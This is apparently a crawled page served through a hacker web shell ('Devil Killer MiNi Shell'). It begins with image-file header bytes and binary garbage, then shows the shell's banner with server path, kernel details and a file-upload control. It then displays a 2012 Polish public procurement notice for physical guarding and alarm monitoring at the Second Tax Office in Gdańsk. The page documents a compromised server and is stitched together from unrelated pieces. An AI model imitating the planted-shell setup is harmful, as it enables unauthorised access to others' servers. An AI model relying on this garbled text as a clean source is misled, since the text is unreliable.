JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120529/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120529/118653-N-2012.html

<p class="kh_header"><b>Gdańsk: Postępowanie o udzielenie zamówienia publicznego na świadczenie usługi 
ochrony fizycznej i monitoringu w obiekcie Drugiego Urzędu Skarbowego w 
Gdańsku przy ul. Kołobrzeskiej 43</b><br>
<b>Numer ogłoszenia: 118653 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Drugi Urząd Skarbowy w Gdańsku , ul. Kołobrzeska 43, 80-391 Gdańsk, woj. pomorskie, tel. 058 69 09 100, faks 058 69 09 101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us2.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na świadczenie usługi 
ochrony fizycznej i monitoringu w obiekcie Drugiego Urzędu Skarbowego w 
Gdańsku przy ul. Kołobrzeskiej 43.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.WARUNKI WYKONANIA USŁUGI OCHRONY OBIEKTU, OSÓB I MIENIA
1.Usługi ochrony mają być prowadzone zgodnie z wymaganiami zawartymi w Instrukcji pełnienia służby przez pracowników ochrony osób i mienia 2.Wykonywanie usługi fizycznej ochrony obiektu, osób i mienia będzie wykonywane                  w wyznaczonych przez Zamawiającego dniach pracy Urzędu w następujących godzinach:
1)poniedziałek, wtorek, czwartek i piątek od godz. 6oo - 19oo - ochraniając obiekt 
2)środa od godz. 6oo - 20oo - ochraniając obiekt,
3.Wykonywanie usługi monitoringu elektronicznego będzie wykonywane w dni tygodnia tj:
1)poniedziałek, wtorek, czwartek i piątek od godz. 19oo - 6oo, 
2)środa od godz. 20oo - 6oo,
3)w dniach dodatkowych wolnych od pracy oraz soboty, niedziele i święta całodobowo.
4.Ochrona fizyczna w dniach dodatkowo wolnych od pracy oraz święta będzie realizowana poprzez podjazdy prewencyjne grupy interwencyjnej wykonywane w zróżnicowanych godzinach, nie rzadziej niż 3 razy na dobę.
5.Służbę fizycznej ochrony pełni trzech pracowników na następujących posterunkach.
1)posterunek stały (PS-1), jednoosobowy, środa od godz. 6oo - 20oo  oraz poniedziałek, wtorek, czwartek i piątek od godz. 6oo - 19oo - usytuowany                       na parterze budynku urzędu, zapewniający koordynację pełnienia służby ochrony, kontrolę nad systemem p.poż, systemem alarmowym włamania i napadu, kierowanie interesantów urzędu do stanowisk w sali obsługi klientów lub właściwych komórek organizacyjnych,
2)posterunek stały (PS-2), jednoosobowy, środa od godz. 8oo - 183o oraz poniedziałek, wtorek, czwartek i piątek od godz. 8oo - 153o - nadzorujący ruch osobowy w sali obsługi klientów,
3)posterunek obchodowy (OB), jednoosobowy, w dni robocze: środa od godz.                    7oo - 183o oraz poniedziałek, wtorek, czwartek i piątek od godz. 7oo - 16oo nadzorujący ruch osobowy w budynku głównym urzędu, pilnujący porządku                          i kontrolujący pojazdy wjeżdżające na teren parkingu wokół budynku.
6.Przed objęciem obiektu ochroną monitoringu elektronicznego wymagany jest udział pracownika grupy interwencyjnej, którego zadaniem jest asysta przy otwieraniu
i zamykaniu głównych drzwi wejściowych do urzędu oraz deponowanie kluczy w centrum monitoringu Wykonawcy.
7.Wykonawca wystawi osobom biorącym udział w realizacji umowy upoważnienie
do dostępu do informacji niejawnych o klauzuli zastrzeżone, zgodnie z przepisami art. 21 ust. 4 pkt 1 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r., Nr 182, poz. 1228),
8.W przypadku braku możliwości wystawienia wyżej wymienionego upoważnienia Wykonawca zobowiązuje się do wystawienia upoważnienia wszystkim pracownikom świadczących usługę w terminie 7 dni od rozpoczęcia realizacji umowy.

II.DO CZYNNOŚCI WCHODZĄCYCH W SKŁAD OCHRONY OSÓB, OBIEKTÓW I MIENIA DRUGIEGO URZĘDU SKARBOWEGO W GDAŃSKU NALEŻY W SZCZEGÓLNOŚCI:
1.Zapewnienie bezpieczeństwa pracowników i klientów Urzędu;
2.Strzeżenie przed kradzieżą, zniszczeniem lub uszkodzeniem mienia Urzędu;
3.Sprawowanie kontroli nad legalnością wynoszenia z budynku sprzętu i materiałów będących własnością urzędu;
4.Ustalenie uprawnień do przebywania w ochranianych budynkach oraz legitymowanie osób, w celu ustalenia ich tożsamości;
5.Wezwanie osób do opuszczenia ochranianych budynków w przypadku stwierdzenia braku uprawnień do przebywania na ich terenie albo stwierdzenia zakłócenia porządku;
6.Ujęcie osób stwarzających zagrożenie dla życia, zdrowia lub nietykalności osobistej,               a także dla chronionego mienia, w celu niezwłocznego przekazania tych osób Policji;
7.Stosowanie środków przymusu bezpośredniego, o których mowa w art. 38 ust. 2 ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. Nr 114, poz. 740                         z późn. zm.) w przypadku zagrożenia dóbr powierzonych ochronie lub odparcia ataku                         na pracownika ochrony;
8.Kontrola zamknięcia i zaplombowania pomieszczeń w chronionym obiekcie po godzinach pracy;
9.Wydawanie kluczy pracownikom oraz ponoszenie odpowiedzialności za gospodarkę kluczami do wszystkich pomieszczeń;
10.Okresowe patrolowanie wnętrza obiektu;
11.Sprawdzanie korytarzy i pomieszczeń ogólnodostępnych pod kątem;
1)nie pozostania w obiekcie osób nieuprawnionych,
2)nie pozostawienia przedmiotów budzących podejrzenia wybuchu, pożaru itp.,
3)czy nie występują objawy awarii wodociągowej lub grzewczej;
12.Sprawdzenie zamknięcia wejściowych drzwi głównych;
13.Niezwłoczne powiadomienie Policji, Straży Miejskiej w przypadku ujawnienia jakiejkolwiek sytuacji podejrzanej zaistniałej na terenie Urzędu;
14.Zapewnienie porządku i kontrolowanie ilości pojazdów wjeżdżających na teren parkingu wokół budynku urzędu;
15.Wykonywanie zadań punktu ostrzegania i alarmowania pracowników Urzędu (w razie zaistnienia zagrożeń);
16.Pełnienie nadzoru nad wyjściami ewakuacyjnymi;
17.Koordynowanie działań ochrony w czasie zagrożenia;
18.Wspomaganie akcji ewakuacyjnej na wypadek zagrożenia;
19.Obserwacje osób wchodzących do sali obsługi klientów i budynku Urzędu;
20.Znajomość i umiejętność obsługi urządzeń systemu sygnalizacji włamania i napadu;
21.Znajomość rozmieszczenia i obsługi podręcznego sprzętu p. poż.;
22.Znajomość rozmieszczenia i umiejętność obsługi w podstawowym zakresie głównych wyłączników prądu, zaworów wodnych i wyłączników systemu alarmowego;
23.Znajomość numerów alarmowych do Policji, Straży Pożarnej, Pogotowia Ratunkowego, Straży Miejskiej, ekip pogotowia technicznego i numerów telefonów kadry kierowniczej urzędu;
24.Podejmowanie niezbędnych interwencji w celu przywrócenia porządku publicznego, przeciwdziałanie zamachom przestępczym;
25.Współdziałanie ze służbami porządkowymi (ratowniczymi);
26.Meldowanie o wszystkich nieprawidłowościach mających wpływ na obniżenie bezpieczeństwa obiektu Pełnomocnikowi ds Ochrony Informacji Niejawnych                           lub wyznaczonemu odpowiedzialnemu za służbę ochrony pracownikowi ze strony Zamawiającego;
27.Prowadzenie zgodnie z obowiązującymi przepisami dokumentacji ochronnej:
1)książki meldunków - pełnienia służby,
2)książki stanu uzbrojenia,
3)książki ewidencji wydawania i przyjmowania broni,
4)książki przeglądów i kontroli sygnalizacji włamania,
5)książki wydawania i zdawania kluczy do pomieszczeń Urzędu,
6)książki wydawania i zdawania toreb z kluczami do pomieszczeń specjalnych Urzędu,
7)książki ruchu osobowego,
8)książki wejść na zaplecze sali obsługi klienta.

III.WYMOGI DOT. PRACOWNIKÓW REALIZUJĄCYCH PRZEDMIOT UMOWY.
1.Pracownicy Wykonawcy świadczący usługi fizycznej ochrony muszą posiadać:
1)licencję pracownika ochrony fizycznej minimum pierwszego stopnia,
2)co najmniej 12 miesięczną praktykę (staż) w wykonywaniu zawodu licencjonowanego pracownika ochrony fizycznej,
3)upoważnienie do dostępu do informacji niejawnych o klauzuli zastrzeżone lub poświadczenie bezpieczeństwa,
4)umundurowanie z logo firmy, którą reprezentują,
5)wyposażenie - środki przymusu bezpośredniego, środki łączności bezprzewodowej, paralizatory zwane bronią,
2.Pracownicy Wykonawcy - załoga grupy interwencyjnej
1)co najmniej 2 pracowników,
2)licencje pracownika ochrony fizycznej pierwszego lub drugiego stopnia,
3)pracownicy w umundurowaniu z logo firmy, którą reprezentują,
4) wyposażenie - środki przymusu bezpośredniego, środki łączności, paralizatory zwane bronią, (mogą posiadać broń gazową lub broń palną krótką),
5)samochód z logo firmy.
3.Kserokopie dokumentów potwierdzających spełnienie wymogów określonych                               w pkt 1 pkt 2 i 3 (potwierdzonych za zgodność) dla wszystkich pracowników wytypowanych do pełnienia służby obiekcie Wykonawca dostarczy nie później niż do              24 czerwca 2011 r.;
4.Pracownicy ochrony przed przyjęciem służby zobowiązani są do zapoznania                        się z obowiązkami i instrukcjami nie później niż do 24 czerwca 2011 r. a następnie                 w terminie wyznaczonym przez Pełnomocnika ds. Ochrony Informacji Niejawnych Drugiego Urzędu Skarbowego, nie później jednak niż 30 dni od daty rozpoczęcia świadczenia usługi ochrony przystąpią do egzaminu (sprawdzianu) ze znajomości obowiązków oraz obowiązujących instrukcji. Egzamin organizuje i sprawdza ww Pełnomocnik lub wyznaczona przez niego osoba w obecności Przedstawiciela Wykonawcy. Tylko pracownicy ochrony, którzy uzyskają pozytywny wynik z egzaminu będą dopuszczeni do dalszego świadczenia usługi ochrony;
5.Dokonywanie zmiany w ramach wytypowanych pracowników do pełnienia służby dopuszcza się z uprzednim minimum 5 dniowym wyprzedzeniem;
6.W przypadku wprowadzenia w trakcie realizacji umowy pracownika lub pracowników ochrony, którzy nie byli wcześniej wytypowani Wykonawca zobowiązany jest dostarczyć: potwierdzone za zgodność kserokopie dokumentów potwierdzających spełnienie wymogów określonych w pkt 1 w ciągu 7 dni od dnia uzyskanej akceptacji zmiany pracownika lub pracowników przez Zamawiającego, Zasady z pkt 3 stosuje się odpowiednio;
7.Pracownicy Wykonawcy zobowiązani są do znajomości i korzystania z następującej dokumentacji ochronnej:
1)Instrukcji pełnienia służby (wyciąg z planu ochrony),
2)Instrukcji ruchu osobowo-materiałowego,
3)Instrukcji przechowywania kluczy,
4)Instrukcji współpracy pracownika ochrony z Policją, jednostkami Straży Pożarnej, Strażą Miejską i Firmą ochroniarską,
5)Instrukcji bezpieczeństwa pożarowego,
6)Instrukcji postępowania służby ochrony i pracowników Urzędu w sytuacjach kryzysowych (pożar, klęska żywiołowa, napad lub zamach terrorystyczny, itp.)
7)Instrukcji użytkowania systemu sygnalizacji włamania i napadu,
8)Instrukcja punktu ostrzegania i alarmowania DUS w Gdańsku,
9)Rejestru kluczy do pomieszczeń biurowych i pomieszczeń specjalnych DUS                     w Gdańsku.

IV.URUCHOMIENIE MONITORINGU ELEKTRONICZNEGO POLEGA NA :
1.Podłączeniu (na koszt Wykonawcy) central SSWiN i p. poż Zamawiającego do stacji monitorowania Wykonawcy przy pomocy łącza sztywnego (na istniejących łączach telefonicznych) lub specjalnego nadajnika GSM lub nadajnika radiowego;
2.Automatycznym przekazywaniu do stacji monitorowania Wykonawcy zdarzeń rejestrowanych przez SSWiN oraz p. poż Zamawiającego:
1)alarmów włamaniowych i napadowych,
2)sygnałów alarmowych i technicznych z systemu sygnalizacji pozaru,
3)prób sabotażu systemu alarmowego.
3.Analizie otrzymanych sygnałów,
4.W przypadku stwierdzenia alarmu lub awarii, niezwłocznym wysłaniu grupy interwencyjnej do chronionego obiektu w celu sprawdzenia stanu zabezpieczenia obiektu i ochrony do czasu usunięcia przyczyny alarmu lub awarii. Czas dotarcia do obiektu Urzędu nie może przekraczać 7 minut.

V.W RAMACH WYKONYWANEJ USŁUGI WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
1.Zapewnienia zgodnego z Planem ochrony:
1)rodzaju i ilości uzbrojenia (paralizatory zwane bronią),
2)rodzaju i ilości środków przymusu bezpośredniego,
3)środków łączności bezprzewodowej,
4)samochodu z logo firmy.
2.Zapewnienia w porozumieniu z Pełnomocnikiem ds. Ochrony Informacji Niejawnych             w Drugim Urzędzie Skarbowym w Gdańsku właściwych warunków przechowywania broni i środków przymusu bezpośredniego;
3.Przedłożenia Zamawiającemu najpóźniej w przeddzień rozpoczęcia realizacji umowy zamówienia dokumentu potwierdzającego, że Wykonawca jest ubezpieczony                            od odpowiedzialności cywilnej oraz oświadczenie o zgodnym z planem ochrony rodzaju               i ilości uzbrojenia, środków przymusu bezpośredniego oraz środków łączności;
4.Wyznaczenia osoby upoważnionej do bezpośrednich kontaktów z Zamawiającym                         w miejscu świadczenia usługi;
5.Przeprowadzania kontroli pracowników ochrony w godzinach urzędowania Zamawiającego nie rzadziej niż 3 razy w miesiącu. Przeprowadzone kontrole muszą zostać odnotowane w książce pełnienia służby;
6.Zapewnienia udziału osoby upoważnionej Wykonawcy w analizie oceny stanu zagrożenia i zabezpieczenia obiektu co najmniej jeden raz w kwartale, w terminie podanym przez Zamawiającego;
7.Zapewnienia każdorazowo udziału grupy interwencyjnej w momencie włączenia alarmu (sprawdzenie przyczyny załączenia alarmu) oraz obejście terenu wokół obiektu;
8.Bieżącego informowania poprzez Centrum Monitoringu Wykonawcy wyznaczonych osób przez Zamawiającego o alarmach i zdarzeniach w obiekcie Urzędu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w kwocie  2 500,00  zł ( słownie: dwa tysiące pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby Wykonawca wskazał iż posiada koncesję MSWiA na prowadzenie działalności w zakresie objętym zamówieniem</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz wykonanych w okresie ostatnich trzech lat (co najmniej pięciu) usług w zakresie i o charakterze złożoności, porównywalnych z zakresem przedmiotu zamówienia przy czym wartość pojedynczej świadczonej usługi nie może być niższa niż 150.000,00 zł brutto rocznie, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców               wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby wykonawca wykazał, iż dysponuje na terenie Trójmiasta( w granicach administracyjnych miast Gdańsk, Sopot, Gdynia):a) odrębnymi, niezależnymi środkami łączności, w które będą wyposażeni pracownicy przewidziani do realizacji zamówienia;
b)posiada w dyspozycji Centrum Monitoringu umożliwiające przyłączenie instalacji alarmowych Zamawiającego w tym również przekazywanie sygnałów alarmowych   i technicznych z systemu sygnalizacji pożaru;
c) dysponuje co najmniej czterema grupami interwencyjnymi z czasem reakcji w dzień i w nocy max 7 minut od chwili wezwania;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby wykonawca wykazał, iż dysponuje na terenie Trójmiasta( w granicach administracyjnych miast Gdańsk, Sopot, Gdynia):
a)minimum 25 osobami, które posiadają licencje pracownika ochrony fizycznej minimum I lub II stopnia;
b)zatrudnia zgodnie z Kodeksem Pracy lub na podstawie umów cywilno prawnych łącznie nie mniej niż 100 pracowników (w osobach);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi dokument potwierdzający, że jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 1.000.000 zł. Spełnieniem tego warunku jest dołączenie polisy ubezpieczenia oraz złożenie oświadczenia o gotowości odnowienia, jeśli ważność ubezpieczenia będzie kończyć się w okresie realizacji zamówienia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)dokument potwierdzający wniesienie wadium, 2) formularz oferty-(zal. 2 do SIWZ), 3) formularz cenowy- (zal.3 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
